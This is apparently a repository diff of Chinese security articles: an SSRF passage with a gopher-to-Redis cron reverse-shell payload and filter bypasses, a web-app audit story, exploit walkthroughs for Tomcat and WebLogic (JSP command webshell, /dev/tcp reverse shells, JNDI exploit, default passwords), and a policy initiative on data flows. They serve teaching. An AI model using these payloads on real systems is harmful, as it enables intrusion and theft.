gopher://192.168.11.132:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252469%250D%250A%250A%250A%252A%2F1%2520%252A%2520%252A%2520%252A%2520%252A%2520bash%2520-c%2520%2522sh%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.11.132%2F1234%25200%253E%25261%2522%250A%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252415%250D%250A%2Fvar%2Fspool%2Fcron%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25244%250D%250Aroot%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
|
||||||
|
```
|
||||||
|
|
||||||
|
3)最后作为参数发送请求包
|
||||||
|
```
|
||||||
|
?url=gopher://192.168.11.132:6379/_%252A1%250D%250A%25248%250D%250Aflushall%250D%250A%252A3%250D%250A%25243%250D%250Aset%250D%250A%25241%250D%250A1%250D%250A%252469%250D%250A%250A%250A%252A%2F1%2520%252A%2520%252A%2520%252A%2520%252A%2520bash%2520-c%2520%2522sh%2520-i%2520%253E%2526%2520%2Fdev%2Ftcp%2F192.168.11.132%2F1234%25200%253E%25261%2522%250A%250A%250A%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%25243%250D%250Adir%250D%250A%252415%250D%250A%2Fvar%2Fspool%2Fcron%250D%250A%252A4%250D%250A%25246%250D%250Aconfig%250D%250A%25243%250D%250Aset%250D%250A%252410%250D%250Adbfilename%250D%250A%25244%250D%250Aroot%250D%250A%252A1%250D%250A%25244%250D%250Asave%250D%250A%250A
|
||||||
|
```
|
||||||
|
|
||||||
|
绕过技巧
|
||||||
|
|
||||||
|
1、**本地回环地址**
|
||||||
|
|
||||||
|
将本地回环地址http://127.0.0.1/改为http://127.1/
|
||||||
|
|
||||||
|
2、**双重URL编码混淆**
|
||||||
|
|
||||||
|
对请求的url进行双重url编码,例如http://127.1/admin改为http://127.1/%2561dmin,对a进行了双重url编码。
|
||||||
|
|
||||||
|
3、**"@"符号绕过**
|
||||||
|
|
||||||
|
该绕过的原理是http://
|
||||||
|
127
|
||||||
|
.0.0.1
|
||||||
|
/a
|
||||||
|
dmin与http://xxx.com@127.0.0.1/admin
|
||||||
|
这两个请求是
|
||||||
|
一样的
|
||||||
|
,
|
||||||
|
也就是说
|
||||||
|
对于限制了域名的网站,可以通过这种方法实现绕过
|
||||||
|
|
||||||
|
修复建议
|
||||||
|
|
||||||
|
1、限制请求的端口只能为web端口,例如80、8080
|
||||||
|
|
||||||
|
2、只允许发起http和https的请求
|
||||||
|
|
||||||
|
3、采用白名单的方式限制访问的目标地址,禁止访问内网ip
|
||||||
|
|
||||||
|
4、屏蔽返回的详细信息
|
||||||
|
|
||||||
|
END
|
||||||
|
|
||||||
|
**查看更多精彩内容,关注**
|
||||||
|
**simple学安全**
|
||||||
|
|
||||||
|
|
81
doc/一次黑盒转变白盒前台漏洞审计过程.md
Normal file
81
doc/一次黑盒转变白盒前台漏洞审计过程.md
Normal file
@ -0,0 +1,81 @@
|
|||||||
|
# 一次黑盒转变白盒前台漏洞审计过程
|
||||||
|
原创 Ambition 进击安全 2024-11-20 06:11
|
||||||
|
|
||||||
|
**免责申明**
|
||||||
|
|
||||||
|
本文章仅用于信息安全防御技术分享,因用于其他用途而产生不良后果,作者不承担任何法律责任,请严格遵循中华人民共和国相关法律法规,禁止做一切违法犯罪行为。
|
||||||
|
|
||||||
|
|
||||||
|
**一、前言******
|
||||||
|
|
||||||
|
在一天跟某位师傅闲聊的时候,突然给了一个站点,说自己的项目打不下,然后有了这个文章。
|
||||||
|
|
||||||
|
**二、黑盒测试******
|
||||||
|
|
||||||
|
****
|
||||||
|
在拿到站点的时候,发现目标网站是一个经典的登录框,并且也没有账号。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
最终在经历漫长的第一次手工爆破就进去了。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
最终找到上述上传点,可以直接进行上传一句话,但是一个漏洞肯定是不够交差的,于是这里开始了白盒之路。
|
||||||
|
|
||||||
|
**三、白盒测试******
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
拿到源码之后其实可以直接看出来是ThinkPHP开发的,这里先定位我们的上传点。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
根据路径进行定位到相关方法处。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
可以看到直接进行了相关的上传,跟入方法local方法。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
可以看到也没有什么过滤,我们可以直接上传相关文件,其中record只是获取到一些文件信息,但是我们的目的还是分析别的漏洞。
|
||||||
|
|
||||||
|
这里直接看前台功能发现一个地方存在泄露。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
这里传递一个参数为sid并且放入数据库查询并且返回出来了相关信息,尝试验证一下。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
连续试了好几个豆没找到,这里重新回去看代码。
|
||||||
|
|
||||||
|
**四、加解密脚本编写******
|
||||||
|
|
||||||
|
****
|
||||||
|
这里查看代码发现对于传入的参数进行了后端的加解密,如下图。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
其中讲传入的参数放入到了hou_dycrypt当中进行了解密,那我们传递的一定要是加密的信息,这里跟入方法查看,一般加解密的方法都是在一个类当中存放的。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
通过名称可以发现一个加密一个解密,这里将代码摘取下来测试。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
传入加密值测试。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
哦吼!,还有一个图片地址,是个人照片,漏洞+1!
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**五、完结**
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
|
357
doc/中间件常见漏洞总结.md
Normal file
357
doc/中间件常见漏洞总结.md
Normal file
@ -0,0 +1,357 @@
|
|||||||
|
# 中间件常见漏洞总结
|
||||||
|
原创 LULU 红队蓝军 2024-11-20 10:07
|
||||||
|
|
||||||
|
# 1、Tomcat
|
||||||
|
## 弱口令导致war远程部署getshell
|
||||||
|
|
||||||
|
**影响版本**:无
|
||||||
|
|
||||||
|
漏洞复现:通过弱口令登录,使用哥斯拉生成一个木马,上传getshell。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
点【取消】按钮,跳转至如下页面
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
根据页面提示信息,在tomcat目录下,找到conf文件夹,然后找到tomcat-users.xml文件。
|
||||||
|
|
||||||
|
如图红色框里的几行代码,红框1里的是用户在安装tomcat时设置的密码,如果用户在安装时未设定密码则如红框2里的显示。username是账户,password是密码。
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
使用哥斯拉声生成木马
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
得到ws.jsp木马文件,将ws.jsp 压缩ws.zip,在一次压缩ws.war后,进行上传
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
访问是否上传成功
|
||||||
|
|
||||||
|
/ws解压后得到ws.jsp ,所以访问ws/ws.jsp
|
||||||
|
|
||||||
|
|
||||||
|
哥斯拉链接成功
|
||||||
|
|
||||||
|

|
||||||
|
## 文件包含漏洞(CVE-2020-1938)
|
||||||
|
|
||||||
|
**漏洞描述:**默认情况下,Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互.但Apache Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的AJP请求,可以读取或者包含Web应用根目录下的任意文件,如果配合文件上传任意格式文件,将可能导致任意代码执行(RCE).该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受漏洞影响(tomcat默认将AJP服务开启并绑定至0.0.0.0/0).
|
||||||
|
|
||||||
|
**影响范围**
|
||||||
|
```
|
||||||
|
Apache Tomcat 9.x < 9.0.31
|
||||||
|
|
||||||
|
Apache Tomcat 8.x < 8.5.51
|
||||||
|
|
||||||
|
Apache Tomcat 7.x < 7.0.100
|
||||||
|
|
||||||
|
Apache Tomcat 6.x
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
**前提条件:**
|
||||||
|
|
||||||
|
对于处在漏洞影响版本范围内的 Tomcat 而言,若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下,即存在被 Ghostcat 漏洞利用的风险。注意 Tomcat AJP Connector 默认配置下即为开启状态,且监听在 0.0.0.0:8009
|
||||||
|
|
||||||
|
**漏洞原理**
|
||||||
|
|
||||||
|
Tomcat 配置了两个Connecto,它们分别是 HTTP 和 AJP :HTTP默认端口为8080,处理http请求,而AJP默认端口8009,用于处理 AJP 协议的请求,而AJP比http更加优化,多用于反向、集群等,漏洞由于Tomcat AJP协议存在缺陷而导致,攻击者利用该漏洞可通过构造特定参数,读取服务器webapp下的任意文件以及可以包含任意文件,如果有某上传点,上传图片马等等,即可以获取shell
|
||||||
|
|
||||||
|
**漏洞危害:**
|
||||||
|
|
||||||
|
攻击者可以读取 Tomcat所有 webapp目录下的任意文件。此外如果网站应用提供文件上传的功能,攻击者可以先向服务端上传一个内容含有恶意 JSP 脚本代码的文件(上传的文件本身可以是任意类型的文件,比如图片、纯文本文件等),然后利用 Ghostcat 漏洞进行文件包含,从而达到代码执行的危害
|
||||||
|
|
||||||
|
**漏洞复现**
|
||||||
|
|
||||||
|
1、下载链接:https://github.com/backlion/CVE-2020-1938/blob/master/apache-tomcat-8.5.32.zip
|
||||||
|
|
||||||
|
2、安装JDK,并配置环境
|
||||||
|
|
||||||
|
3、启动tomcat,点击tomcat目录/bin 文件夹下的startup.bat
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**任意文件读取**
|
||||||
|
|
||||||
|
可以读取webapps目录下的任何文件
|
||||||
|
```
|
||||||
|
python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.1.9 -p 8009 -f WEB-INF/web.xml
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
任意文件包含
|
||||||
|
|
||||||
|
1、首先得上传一个要包含的文件内容,并将文件上传到webapps目录
|
||||||
|
|
||||||
|
test.txt
|
||||||
|
```
|
||||||
|
<%out.println(new java.io.BufferedReader(new java.io.InputStreamReader(Runtime.getRuntime().exec("whoami").getInputStream())).readLine());%>
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
2、访问该文件内容test.txt
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
3、输入命令,执行命令
|
||||||
|
```
|
||||||
|
python3 cve-2020-10487-v1.py 192.168.1.9 -p 8009 -f exec.txt --rce 1
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
## 文件上传漏洞(CVE-2017-12615)
|
||||||
|
|
||||||
|
**漏洞原理**
|
||||||
|
|
||||||
|
当 Tomcat 运行在 Windows 主机上,启用了 HTTP PUT 请求方法,可以通过构造请求向服务器上传包含任意代码的 JSP 文件,导致 JSP 文件中的代码能够被服务器执行
|
||||||
|
|
||||||
|
**影响范围:**
|
||||||
|
|
||||||
|
Tomcat 7.0.0 - 7.0.81
|
||||||
|
|
||||||
|
**漏洞描述**:Apache Tomcat 7.0.0 - 7.0.79漏洞产生原因:在这个Dockerfile文件中,通过修改web.xml文件来添加一个名为readonly的参数,其值为false
|
||||||
|
|
||||||
|
**漏洞复现:**
|
||||||
|
|
||||||
|
靶场搭建可以直接使用vulhub
|
||||||
|
|
||||||
|
可以看到readonly值为false
|
||||||
|
|
||||||
|

|
||||||
|
```
|
||||||
|
PUT /1.jsp/ HTTP/1.1
|
||||||
|
Host: your-ip:8080
|
||||||
|
Accept: */*
|
||||||
|
Accept-Language: en
|
||||||
|
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
|
||||||
|
Connection: close
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 5
|
||||||
|
|
||||||
|
<%
|
||||||
|
java.io.InputStream is = Runtime.getRuntime()
|
||||||
|
.exec(request.getParameter("command"))
|
||||||
|
.getInputStream();
|
||||||
|
int a = -1;
|
||||||
|
byte[] b = new byte[2048];
|
||||||
|
while ((a = is.read(b)) != -1) {
|
||||||
|
out.print(new String(b));
|
||||||
|
}
|
||||||
|
%>
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
访问,即可执行任意命令
|
||||||
|
|
||||||
|

|
||||||
|
# 2、Weblogic
|
||||||
|
## 任意文件读取漏洞
|
||||||
|
|
||||||
|
**漏洞原理:**路径下存在任意文件读取: /hello/file.jsp?path=/etc/passwd
|
||||||
|
|
||||||
|
**影响范围:**
|
||||||
|
```
|
||||||
|
Weblogic 10.3.6.0
|
||||||
|
Weblogic 12.1.3.0
|
||||||
|
Weblogic 12.2.1.2
|
||||||
|
Weblogic 12.2.1.3
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
**漏洞复现**
|
||||||
|
|
||||||
|
通过/etc/passwd读取用户信息
|
||||||
|
|
||||||
|
http://xxx:7001/hello/file.jsp?path=/etc/passwd
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
1、读取密文文件
|
||||||
|
|
||||||
|
读取配置文件拿到加密密钥:
|
||||||
|
```
|
||||||
|
/root/Oracle/Middleware/user_projects/domains/base_domain/config/config.xml
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
2、读取加密后的密码
|
||||||
|
|
||||||
|
使用burp抓包后,并将密码存储为.dat文件
|
||||||
|
```
|
||||||
|
/root/Oracle/Middleware/user_projects/domains/base_domain/security/SerializedSystemIni.dat
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
将读取的文件内容生成文件
|
||||||
|
|
||||||
|
3、解密
|
||||||
|
|
||||||
|
https://github.com/TideSec/Decrypt_Weblogic_Password
|
||||||
|
|
||||||
|

|
||||||
|
## 远程命令执行漏洞
|
||||||
|
|
||||||
|
CVE-2020-14882: 代码执行漏洞
|
||||||
|
|
||||||
|
远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Console 执行任意代码。
|
||||||
|
CVE-2020-14883: 权限绕过漏洞
|
||||||
|
|
||||||
|
远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console
|
||||||
|
|
||||||
|
**漏洞原理**
|
||||||
|
|
||||||
|
CVE-2020-14883允许后台任意用户通过HTTP协议执行任意命令。使用这两个漏洞组成的利用链,可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令
|
||||||
|
|
||||||
|
**影响范围**
|
||||||
|
```
|
||||||
|
WebLogic 10.3.6.0.0
|
||||||
|
WebLogic 12.1.3.0.0
|
||||||
|
WebLogic 12.2.1.3.0
|
||||||
|
WebLogic 12.2.1.4.0
|
||||||
|
WebLogic 14.1.1.0.0
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
**漏洞复现**
|
||||||
|
|
||||||
|
构造xml文件
|
||||||
|
```
|
||||||
|
<?xml version="1.0" encoding="UTF-8" ?>
|
||||||
|
<beans xmlns="http://www.springframework.org/schema/beans"
|
||||||
|
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
|
||||||
|
xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd">
|
||||||
|
<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">
|
||||||
|
<constructor-arg>
|
||||||
|
<list>
|
||||||
|
<value>bash</value>
|
||||||
|
<value>-c</value>
|
||||||
|
<value><![CDATA[touch /tmp/success]]></value>
|
||||||
|
</list>
|
||||||
|
</constructor-arg>
|
||||||
|
</bean>
|
||||||
|
</beans>
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
访问.xml文件,会在tmp生成success文件
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
同理:修改 .xml文件中<![CDATA[bash-i >& /dev/tcp/攻击机IP/4444 0>&1]>即可反弹shell
|
||||||
|
## 未授权远程代码执行漏洞(CVE-2023-21839)
|
||||||
|
|
||||||
|
**漏洞原理**
|
||||||
|
|
||||||
|
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。
|
||||||
|
|
||||||
|
**影响范围:**
|
||||||
|
```
|
||||||
|
12.2.1.2.0
|
||||||
|
12.2.1.1.0
|
||||||
|
12.2.1.3.0
|
||||||
|
12.2.1.0.0
|
||||||
|
12.2.1.4.0
|
||||||
|
14.1.1.0.0
|
||||||
|
12.1.2.0.0
|
||||||
|
12.1.3.0.0
|
||||||
|
10.3.6.0
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
**FOFA**
|
||||||
|
```
|
||||||
|
app="BEA-WebLogic-Server" || app="Weblogic_interface_7001"
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
Vulfocus 已经集成该漏洞环境可通过以下环境使用:
|
||||||
|
```
|
||||||
|
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.2.0-jdk-release
|
||||||
|
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.1.0-jdk-release
|
||||||
|
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.3.0-jdk-release
|
||||||
|
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.4.0-jdk-release
|
||||||
|
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.2.1.0.0-jdk-release
|
||||||
|
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:14.1.1.0.0-jdk-release
|
||||||
|
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.2.0.0-jdk-release
|
||||||
|
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:12.1.3.0.0-jdk-release
|
||||||
|
docker pull vulfocus/vcpe-1.0-a-oracle-weblogic:10.3.6.0-jdk-release
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
**漏洞环境:**利用vulhub
|
||||||
|
|
||||||
|
**漏洞复现:**
|
||||||
|
|
||||||
|
下载https://github.com/WhiteHSBG/JNDIExploit
|
||||||
|
|
||||||
|
1、搭建ldap服务
|
||||||
|
```
|
||||||
|
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i kali的ip
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
2、kali 开启NC
|
||||||
|
```
|
||||||
|
nc -lvvp 9999
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
3、下载EXP
|
||||||
|
|
||||||
|
https://github.com/DXask88MA/Weblogic-CVE-2023-21839
|
||||||
|
|
||||||
|
执行命令
|
||||||
|
```
|
||||||
|
java -jar Weblogic-CVE-2023-21839.jar 靶场 IP:7001 ldap://ldap服务器IP:1389/Basic/ReverseShell/ldap服务器IP/nc监听端口
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
4、成功反弹shell,监听成功
|
||||||
|
|
||||||
|

|
||||||
|
|
||||||
|
**Weblogic常用弱口令**
|
||||||
|
|
||||||
|
可以去测试一下是否能登录上
|
||||||
|
```
|
||||||
|
weblogic/Oracle@123
|
||||||
|
system/password
|
||||||
|
weblogic/weblogic
|
||||||
|
admin/security
|
||||||
|
joe/password
|
||||||
|
mary/password
|
||||||
|
system/security
|
||||||
|
wlcsystem/wlcsystem
|
||||||
|
wlpisystem/wlpisystem
|
||||||
|
weblogic/weblogic123
|
||||||
|
weblogic/weblogic2
|
||||||
|
system/password
|
||||||
|
weblogic/weblogic
|
||||||
|
admin/security
|
||||||
|
joe/password
|
||||||
|
mary/password
|
||||||
|
system/security
|
||||||
|
wlcsystem/wlcsystem
|
||||||
|
wlpisystem/wlpisystem
|
||||||
|
guest/guest
|
||||||
|
portaladmin/portaladmin
|
||||||
|
system/system
|
||||||
|
WebLogic/WebLogic
|
||||||
|
|
||||||
|
```
|
||||||
|
|
||||||
|
|
134
doc/信息安全漏洞周报(2024年第47期).md
Normal file
134
doc/信息安全漏洞周报(2024年第47期).md
Normal file
File diff suppressed because one or more lines are too long
113
doc/全球数据跨境流动合作倡议.md
Normal file
113
doc/全球数据跨境流动合作倡议.md
Normal file
@ -0,0 +1,113 @@
|
|||||||
|
# 全球数据跨境流动合作倡议
|
||||||
|
中国网络空间安全协会 2024-11-20 04:21
|
||||||
|
|
||||||
|
伴随数字技术渗透到人类生产生活的方方面面,全球数字经济快速发展,数字社会逐步成为人们分享文明进步的新空间。数据作为数字经济的关键要素,在创新发展和公共治理中正在发挥越来越重要的作用。数据跨境流动对于各国电子商务、数字贸易乃至经济科技文化等诸多方面至关重要,不仅可以有效降低贸易成本,提高企业开展国际贸易的能力,还有助于促进贸易便利化,加快产业数字化转型,弥合数字鸿沟,实现以数据流动为牵引的新型全球化。目前,国际社会正在积极探索形成全球数字领域规则和秩序,联合国制定发布《全球数字契约》、世贸组织电子商务谈判以及《全面与进步跨太平洋伙伴关系协定》(CPTPP)、《数字经济伙伴关系协定》(DEPA)等多双边实践正在开展,这些均体现了推动全球数据跨境流动合作、促进数据跨境流动已经成为各国或地区共同的意愿和选择。
|
||||||
|
|
||||||
|
|
||||||
|
我们注意到,在推动全球数据跨境流动实践的同时,各国普遍关注国家安全、公共利益、个人隐私以及知识产权等风险。我们认为,国际社会应在充分尊重各国、各地区因具体国情、社情而采取的不同政策法规和实践基础上,认真听
|
||||||
|
取各方数据安全与发展的利益诉求,通过协商的方式推动国家间、地区间数据跨境流动规则形成共识。
|
||||||
|
|
||||||
|
|
||||||
|
我们呼吁各国秉持开放、包容、安全、合作、非歧视的原则,平衡数字技术创新、数字经济发展、数字社会进步与保护国家安全、公共利益、个人隐私和知识产权的关系,在推动数据跨境流动的同时实现各国合法政策目标。我们期待政府、国际组织、企业、民间机构等各主体坚守共商共建共享理念,发挥各自作用,推动全球数据跨境流动合作,携手构建高效便利安全的数据跨境流动机制,打造共赢的数据领域国际合作格局,推动数字红利惠及各国人民。
|
||||||
|
|
||||||
|
|
||||||
|
为此,我们倡议各国政府:
|
||||||
|
|
||||||
|
|
||||||
|
——鼓励因正常商业和社会活动需要而通过电子方式跨境传输数据,以实现全球电子商务和数字贸易为各国经济增长和可持续增长提供新的动力。
|
||||||
|
|
||||||
|
|
||||||
|
——尊重不同国家、不同地区之间数据跨境流动相关制度的差异性。支持不涉及国家安全、公共利益和个人隐私的数据自由流动。允许为实现合法公共政策目标对数据跨境流动进行监管,前提是相关监管措施不构成任意或不合理的歧视或对贸易构成变相限制,不超出实现目标所要求的限度。
|
||||||
|
|
||||||
|
|
||||||
|
——尊重各国依法对涉及国家安全、公共利益的非个人数据采取必要的安全保护措施,保障相关非个人数据跨境安全有序流动。
|
||||||
|
|
||||||
|
|
||||||
|
——尊重各国为保护个人隐私等个人信息权益采取的措施,鼓励各国在保护个人信息的前提下为个人信息跨境传输提供便利途径,建立健全个人信息保护法律和监管框架,鼓励就此交流最佳实践和良好经验,提升个人信息保护机制、规则之间的兼容性,推动相关标准、技术法规及合格评定程序的互认。鼓励企业获得个人信息保护认证,以表明其符合个人信息保护标准,保障个人信息跨境安全有序流动。
|
||||||
|
|
||||||
|
|
||||||
|
——鼓励探索建立数据跨境流动管理负面清单,促进数据跨境高效便利安全流动。
|
||||||
|
|
||||||
|
|
||||||
|
——合力构建开放、包容、安全、合作、非歧视的数据流通使用环境,共同维护公平公正的市场秩序,促进数字经济规范健康发展。
|
||||||
|
|
||||||
|
|
||||||
|
——提高各类数据跨境流动管理措施的透明度、可预见性和非歧视性,以及政策框架的互操作性。
|
||||||
|
|
||||||
|
|
||||||
|
——积极开展数据跨境流动领域的国际合作。支持发展中国家和最不发达国家有效参与和利用数据跨境流动以促进数字经济增长,鼓励发达国家向发展中国家,特别是最不发达国家提供能力建设和技术援助,弥合数字鸿沟,实现公平和可持续发展。
|
||||||
|
|
||||||
|
|
||||||
|
——鼓励利用数字技术促进数据跨境流动创新应用,提高保障数据跨境高效便利安全流动的技术能力,推动数据跨境流动相关的技术与安全保障能力评价标准的国际互认,做好知识产权保护工作。
|
||||||
|
|
||||||
|
|
||||||
|
——反对将数据问题泛安全化,反对在缺乏事实证据的情况下针对特定国家、特定企业差别化制定数据跨境流动限制性政策,实施歧视性的限制、禁止或者其他类似措施。
|
||||||
|
|
||||||
|
|
||||||
|
——禁止通过在数字产品和服务中设置后门、利用数字技术基础设施中的漏洞等手段非法获取数据,共同打击数据领域跨境违法犯罪活动,共同保障各国公民和企业的合法权益。
|
||||||
|
|
||||||
|
|
||||||
|
我们愿意在以上倡议基础上与各方开展和深化数据跨境流动领域的交流合作,我们呼吁各国、各地区通过双多边或地区协议、安排等形式呼应、确认上述倡议。欢迎国际组织、企业、民间机构等各主体支持本倡议。
|
||||||
|
|
||||||
|
|
||||||
|
**Global Cross-border Data Flow**
|
||||||
|
**Cooperation Initiative**
|
||||||
|
|
||||||
|
|
||||||
|
As digital technologies increasingly permeate every aspect of daily life and production, the global digital economy has experienced rapid development, with digital societies emerging as new spaces for sharing the progress of human civilization. As an essential element in the digital economy, data is playing an increasingly important role in innovative development and public governance. Cross-border data flows are vital to e-commerce, digital trade, and various aspects of global economic, technological and cultural activities. It can reduce trade cost, enhance companies' capacity to engage in international trade, facilitate trade processes, accelerate industrial digitalization, bridge the digital divide, and foster a new type of globalization driven by data flows. Currently, the international community is actively exploring and establishing global rules and order in the digital sphere. Bilateral and multilateral efforts such as the Global Digital Compact by the United Nations, negotiations on e-commerce at the World Trade Organization, the Comprehensive and Progressive Agreement for Trans-Pacific Partnership, and the Digital Economy Partnership Agreement exemplify the shared willingness of and choices made by countries and regions worldwide to promote cooperation on cross-border data flows.
|
||||||
|
|
||||||
|
|
||||||
|
We noticed that, while promoting global cross-border data flows, countries are primarily concerned with risks related to national security, public interests, personal privacy, and intellectual property. We believe that the international community should fully respect the different policies and practices adopted by various countries and regions based on their specific conditions. It is crucial to pay heed to each party's concerns regarding data security and development and to work toward building consensus on cross-border data flow rules through consultation among countries and regions.
|
||||||
|
|
||||||
|
|
||||||
|
We call on all countries to uphold principles of openness, inclusiveness, security, cooperation, and non-discrimination, balance the promotion of digital technology innovation, the development of the digital economy, and the advancement of digital society with the protection of national security, public interests, personal privacy, and intellectual property, and foster cross-border data flows while ensuring that each country's legitimate policy goals are met. We hope that governments, international organizations, businesses, and civil society will adhere to the principles of extensive consultation, joint contribution, and shared benefits. By playing their respective roles, they can promote global cooperation on cross-border data flow, jointly build a mechanism to ensure efficient, convenient and safe cross-border data flow and an open and mutually beneficial landscape for international cooperation in the data sphere, and ensure that the benefits of digital advancements are shared by people worldwide.
|
||||||
|
|
||||||
|
|
||||||
|
To make this happen, we suggest the following:
|
||||||
|
|
||||||
|
|
||||||
|
——Governments should encourage electronic cross-border data transmission to meet the needs of business and social activities. This will help global e-commerce and digital trade serve as new drivers for economic growth and sustainable development.
|
||||||
|
|
||||||
|
|
||||||
|
——Governments should respect the regulatory differences of various countries and regions in cross-border data flows. They should support free data flows that do not violate national security, public interests, and personal privacy. Regulations on cross-border data flows should be permitted when they aim to achieve legitimate public policy objectives on the premise that such regulatory measures do not constitute a means of arbitrary or unjustifiable discrimination or a disguised restriction on international trade, and do not cross the limits of the goals they seek to achieve.
|
||||||
|
|
||||||
|
|
||||||
|
——Governments should respect security measures taken by all countries in accordance with their laws to protect non-personal data related to national security and public interests, and ensure the secure and orderly cross-border flows of relevant non-personal data.
|
||||||
|
|
||||||
|
|
||||||
|
——Governments should respect measures taken by all countries to protect personal information rights and interests including individual privacy. Countries should be encouraged to provide convenient channels for cross-border transmission of personal information on the condition that such information is well protected. Countries should be encouraged to establish and improve legal and supervision frameworks on personal information protection, conduct exchanges on best practices and experiences, improve the compatibility of personal information protection mechanisms and rules, and foster mutual recognition of relevant standards, technology regulations and conformity assessment procedures. Enterprises should be encouraged to obtain personal information protection certifications to demonstrate their compliance with personal information protection standards and ensure the secure and orderly cross-border flows of personal information.
|
||||||
|
|
||||||
|
|
||||||
|
——Governments should support exploring the establishment of negative lists for managing cross-border data flow to promote efficient, convenient and safe cross-border data flow.
|
||||||
|
|
||||||
|
|
||||||
|
——Governments should work together to create a data flow and usage environment that is open, inclusive, secure, and non-discriminatory, jointly uphold a fair and just market order, and promote the orderly and healthy development of the digital economy.
|
||||||
|
|
||||||
|
|
||||||
|
——Governments should enhance the transparency, predictability, and non-discriminatory nature of measures managing the cross-border flows of various types of data, as well as the interoperability of policy frameworks.
|
||||||
|
|
||||||
|
|
||||||
|
——Governments should actively conduct international cooperation in the field of cross-border data flows. Support should be given to developing countries and the least developed countries to enable them to effectively participate in and utilize cross-border data flows so as to promote their digital economic growth. Developed countries should be encouraged to provide capacity building and technical assistance to developing countries, especially the least developed ones, in order to bridge the digital divide and achieve fair and sustainable development.
|
||||||
|
|
||||||
|
|
||||||
|
